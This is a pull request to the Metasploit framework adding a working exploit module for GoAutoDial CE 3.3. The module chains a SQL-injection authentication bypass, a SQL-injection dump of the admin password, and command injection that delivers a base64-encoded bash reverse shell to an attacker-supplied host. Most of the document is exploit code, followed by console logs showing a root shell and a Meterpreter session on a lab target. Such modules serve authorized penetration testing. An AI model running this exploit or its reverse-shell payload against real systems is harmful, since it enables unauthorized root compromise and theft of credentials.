### PR TITLE
Add GoAutoDial 3.3 RCE Command Injection / SQL injection module

### DIFF
--- a/documentation/modules/exploit/linux/goautodial_3_rce_code_injection.md
+++ b/documentation/modules/exploit/linux/goautodial_3_rce_code_injection.md
@@ -1,0 +1,52 @@
+## Description
+This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database. 
+
+## Affected software
+GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
+Refer to: https://www.exploit-db.com/exploits/36807/
+
+## Verification
+List the steps needed to make sure this thing works
+
+- Start `msfconsole`
+- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
+- Do `set payload cmd/unix/reverse_bash`
+- Do `set RHOST <IP>`
+- Do `set LHOST <IP>`
+- Do `set LPORT <PORT>`
+- Wait for shell
+```
+msf exploit(goautodial_3_rce_command_injection) > check
+[+] 192.168.0.76:443 The target is vulnerable.
+msf exploit(goautodial_3_rce_command_injection) > exploit -z
+
+[*] Started reverse TCP handler on 192.168.0.11:4444 
+[*] 192.168.0.76:443 - Trying SQL injection...
+[+] Authentication Bypass (SQLi) was successful
+[*] 192.168.0.76:443 - Dumping admin password...
+[+] admin|goautodial|Admin|||Y
+[*] 192.168.0.76:443 - Sending payload...waiting for connection
+[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
+[*] Session 7 created in the background.
+msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
+[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]
+
+[*] Upgrading session ID: 7
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 192.168.0.11:4433 
+[*] Starting the payload handler...
+[*] Sending stage (797784 bytes) to 192.168.0.76
+[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
+[*] Command stager progress: 100.00% (668/668 bytes)
+msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
+[*] Starting interaction with 8...
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : test
+OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
+Architecture : x64
+Meterpreter  : x86/linux
+
+```

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => "GoAutoDial 3.3 Authentication Bypass",
       'Description'    => %q{
           This module exploits a SQL injection flaw in the login functionality
-for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with oOOT privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
+for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -12,8 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "GoAutoDial 3.3 Authentication Bypass",
       'Description'    => %q{
-          This module exploits a SQL injection flaw in the login functionality
-for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
+          This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -50,7 +49,7 @@ for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command
       return Exploit::CheckCode::Vulnerable
     end
   end
-   $
+   
   def check_version()
     send_request_cgi({
     'method'    => 'GET',
@@ -67,12 +66,12 @@ for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command
     send_request_cgi({
       'method'    => 'POST',
       'uri'       => "/index.php/go_login/validate_credentials",
-      'headers'   =>$
+      'headers'   =>
         {
         'User-Agent' => 'Mozilla/5.0',
         'Accept-Encoding' => 'identity'
         },
-      'vars_post' =>$
+      'vars_post' =>
         {
         'user_name'   => 'admin',
         'user_pass'   => "' or '1'='1"
@@ -85,7 +84,7 @@ for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command
    send_request_cgi({
       'method'    => 'GET',
       'uri'       => "/index.php/go_site/go_get_user_info/'%20OR%20active='Y",
-      'headers'   =>$
+      'headers'   =>
         {
         'User-Agent' => 'Mozilla/5.0',
         'Accept-Encoding' => 'identity',
@@ -107,7 +106,7 @@ for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command
       'Accept-Encoding' => 'identity',
       'Cookie' => cookies
       }
-      })$
+      })
   end
 
   #
@@ -119,7 +118,7 @@ for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command
 
     if res1 && res1.code == 200
       print_good("Authentication Bypass (SQLi) was successful")
-    else$
+    else
       print_error("Error: Run 'check' command to identify whether the auth bypass has been fixed")
     end
 

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Vulnerable
     end
   end
-   
+
   def check_version()
     send_request_cgi({
     'method'    => 'GET',

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = target_uri.path
 
     send_request_cgi({
-    'method'    => 'GET',
-    'uri'       => normalize_uri(uri, 'changelog.txt'),
-    'headers'   => {
-    'User-Agent' => 'Mozilla/5.0',
-    'Accept-Encoding' => 'identity'
-    }
+      'method'    => 'GET',
+      'uri'       => normalize_uri(uri, 'changelog.txt'),
+      'headers'   => {
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity'
+      }
     })
   end
 
@@ -69,16 +69,14 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'method'    => 'POST',
       'uri'       => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
-      'headers'   =>
-        {
+      'headers'   => {
         'User-Agent' => 'Mozilla/5.0',
         'Accept-Encoding' => 'identity'
-        },
-      'vars_post' =>
-        {
+      },
+      'vars_post' => {
         'user_name'   => 'admin',
         'user_pass'   => '\'%20or%20\'1\'%3D\'1'
-        }
+      }
     })
   end
 
@@ -88,13 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote
    send_request_cgi({
       'method'    => 'GET',
       'uri'       => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
-      'headers'   =>
-        {
+      'headers'   => {
         'User-Agent' => 'Mozilla/5.0',
         'Accept-Encoding' => 'identity',
         'Cookie' => cookies
-        }
-      })
+      }
+    })
   end
 
   #
@@ -110,13 +107,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'GET',
       'uri'       => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
       'headers'   => {
-      'User-Agent' => 'Mozilla/5.0',
-      'Accept-Encoding' => 'identity',
-      'Cookie' => @cookie
-
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity',
+        'Cookie' => @cookie
       }
-      })
-
+    })
   end
 
 

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "GoAutoDial 3.3 Authentication Bypass",
+      'Description'    => %q{
+          This module exploits a SQL injection flaw in the login functionality
+for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with oOOT privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris McCurley',  # Discovery & Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-2843'],
+          ['CVE', '2015-2845']
+        ],
+      'Platform'       => %w{ linux },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 21 2015"))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptBool.new('SSL', [false, 'Use SSL', true])
+      ])
+  end
+
+
+  def check
+    res = check_version()
+    if res and res.body =~ /1421902800/
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Vulnerable
+    end
+  end
+   $
+  def check_version()
+    send_request_cgi({
+    'method'    => 'GET',
+    'uri'       => "/changelog.txt",
+    'headers'   => {
+    'User-Agent' => 'Mozilla/5.0',
+    'Accept-Encoding' => 'identity'
+    }
+    })
+  end
+
+  def sqli_auth_bypass()
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => "/index.php/go_login/validate_credentials",
+      'headers'   =>$
+        {
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity'
+        },
+      'vars_post' =>$
+        {
+        'user_name'   => 'admin',
+        'user_pass'   => "' or '1'='1"
+        }
+    })
+  end
+
+  def sqli_admin_pass(cookies)
+
+   send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => "/index.php/go_site/go_get_user_info/'%20OR%20active='Y",
+      'headers'   =>$
+        {
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity',
+        'Cookie' => cookies
+        }
+      })
+  end
+
+  def exec_command(cookies)
+    payload = "bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
+    encoded = "#{Rex::Text.encode_base64(payload)}"
+    params = "||%20bash%20-c%20\"eval%20\`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
+
+    send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => "/index.php/go_site/cpanel/"+ params,
+      'headers'   => {
+      'User-Agent' => 'Mozilla/5.0',
+      'Accept-Encoding' => 'identity',
+      'Cookie' => cookies
+      }
+      })$
+  end
+
+  #
+  # Run the actual exploit
+  #
+  def run_it()
+    print_status("#{rhost}:#{rport} - Trying SQL injection...")
+    res1 = sqli_auth_bypass()
+
+    if res1 && res1.code == 200
+      print_good("Authentication Bypass (SQLi) was successful")
+    else$
+      print_error("Error: Run 'check' command to identify whether the auth bypass has been fixed")
+    end
+
+    print_status("#{rhost}:#{rport} - Dumping admin password...")
+    res = sqli_admin_pass(res1.get_cookies)
+
+    if res
+      print_good(res.body)
+    else
+      print_error("Error: No creds returned, possible mitigations in place.")
+    end
+    print_status("#{rhost}:#{rport} - Attempting reverse_tcp shell one-liner...wait for connection")
+    exec_command(res1.get_cookies)
+  end
+
+
+  def exploit()
+    run_it()
+  end
+end

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "GoAutoDial 3.3 Authentication Bypass",
+      'Name'           => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
       'Description'    => %q{
           This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
       },
@@ -24,19 +24,19 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2015-2843'],
           ['CVE', '2015-2845']
         ],
-      'Platform'       => %w{ linux },
-      'Targets'        =>
-        [
-          ['Automatic', {}]
-        ],
+      'Platform'       => %w{unix},
+      'Arch'            => ARCH_CMD,
+      'Targets'        => [ ['Automatic', {} ] ],
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
       'DefaultTarget'  => 0,
       'Privileged'     => false,
-      'DisclosureDate' => "Apr 21 2015"))
+      'DisclosureDate' => 'Apr 21 2015'))
 
     register_options(
       [
         OptPort.new('RPORT', [true, 'The target port', 443]),
-        OptBool.new('SSL', [false, 'Use SSL', true])
+        OptBool.new('SSL', [false, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
       ])
   end
 
@@ -51,9 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_version()
+    uri = target_uri.path
+
     send_request_cgi({
     'method'    => 'GET',
-    'uri'       => "/changelog.txt",
+    'uri'       => normalize_uri(uri, 'changelog.txt'),
     'headers'   => {
     'User-Agent' => 'Mozilla/5.0',
     'Accept-Encoding' => 'identity'
@@ -62,10 +64,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def sqli_auth_bypass()
+    uri = target_uri.path
 
     send_request_cgi({
       'method'    => 'POST',
-      'uri'       => "/index.php/go_login/validate_credentials",
+      'uri'       => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
       'headers'   =>
         {
         'User-Agent' => 'Mozilla/5.0',
@@ -74,16 +77,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' =>
         {
         'user_name'   => 'admin',
-        'user_pass'   => "' or '1'='1"
+        'user_pass'   => '\'%20or%20\'1\'%3D\'1'
         }
     })
   end
 
   def sqli_admin_pass(cookies)
+   uri = target_uri.path
 
    send_request_cgi({
       'method'    => 'GET',
-      'uri'       => "/index.php/go_site/go_get_user_info/'%20OR%20active='Y",
+      'uri'       => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
       'headers'   =>
         {
         'User-Agent' => 'Mozilla/5.0',
@@ -93,33 +97,37 @@ class MetasploitModule < Msf::Exploit::Remote
       })
   end
 
-  def exec_command(cookies)
-    payload = "bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
-    encoded = "#{Rex::Text.encode_base64(payload)}"
-    params = "||%20bash%20-c%20\"eval%20\`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
+  #
+  # Run the actual exploit
+  #
+  def execute_command(cookies)
+
+    encoded = Rex::Text.encode_base64("#{payload.encoded}")
+    params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
+    uri = target_uri.path
 
     send_request_cgi({
       'method'    => 'GET',
-      'uri'       => "/index.php/go_site/cpanel/"+ params,
+      'uri'       => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
       'headers'   => {
       'User-Agent' => 'Mozilla/5.0',
       'Accept-Encoding' => 'identity',
       'Cookie' => cookies
+
       }
       })
+
   end
 
-  #
-  # Run the actual exploit
-  #
-  def run_it()
+
+  def exploit()
     print_status("#{rhost}:#{rport} - Trying SQL injection...")
     res1 = sqli_auth_bypass()
 
     if res1 && res1.code == 200
-      print_good("Authentication Bypass (SQLi) was successful")
+      print_good('Authentication Bypass (SQLi) was successful')
     else
-      print_error("Error: Run 'check' command to identify whether the auth bypass has been fixed")
+      print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
     end
 
     print_status("#{rhost}:#{rport} - Dumping admin password...")
@@ -128,14 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote
     if res
       print_good(res.body)
     else
-      print_error("Error: No creds returned, possible mitigations in place.")
+      print_error('Error: No creds returned, possible mitigations are in place.')
     end
-    print_status("#{rhost}:#{rport} - Attempting reverse_tcp shell one-liner...wait for connection")
-    exec_command(res1.get_cookies)
-  end
+    print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
 
-
-  def exploit()
-    run_it()
+    execute_command(res1.get_cookies)
   end
 end

--- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
+++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Run the actual exploit
   #
-  def execute_command(cookies)
+  def execute_command()
 
     encoded = Rex::Text.encode_base64("#{payload.encoded}")
     params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers'   => {
       'User-Agent' => 'Mozilla/5.0',
       'Accept-Encoding' => 'identity',
-      'Cookie' => cookies
+      'Cookie' => @cookie
 
       }
       })
@@ -130,8 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
     end
 
+    @cookie = res1.get_cookies
     print_status("#{rhost}:#{rport} - Dumping admin password...")
-    res = sqli_admin_pass(res1.get_cookies)
+    res = sqli_admin_pass(@cookie)
 
     if res
       print_good(res.body)
@@ -140,6 +141,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
 
-    execute_command(res1.get_cookies)
+    execute_command()
   end
 end


### PR DESCRIPTION
## Description
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database. 

## Affected software
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
Refer to: https://www.exploit-db.com/exploits/36807/

## Verification
List the steps needed to make sure this thing works

- [x] `msfconsole`
- [x] `use exploit/linux/http/goautodial_3_rce_command_injection`
- [x] `set payload cmd/unix/reverse_bash`
- [x] `set RHOST <IP>`
- [x] `set LHOST <IP>`
- [x] `set LPORT <PORT>`
- [x] `exploit -z`
- [x] Wait for shell
```
msf exploit(goautodial_3_rce_command_injection) > check
[+] 192.168.0.76:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > exploit -z

[*] Started reverse TCP handler on 192.168.0.11:4444 
[*] 192.168.0.76:443 - Trying SQL injection...
[+] Authentication Bypass (SQLi) was successful
[*] 192.168.0.76:443 - Dumping admin password...
[+] admin|goautodial|Admin|||Y
[*] 192.168.0.76:443 - Sending payload...waiting for connection
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
[*] Session 7 created in the background.
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]

[*] Upgrading session ID: 7
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.11:4433 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.76
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : test
OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : x64
Meterpreter  : x86/linux

```
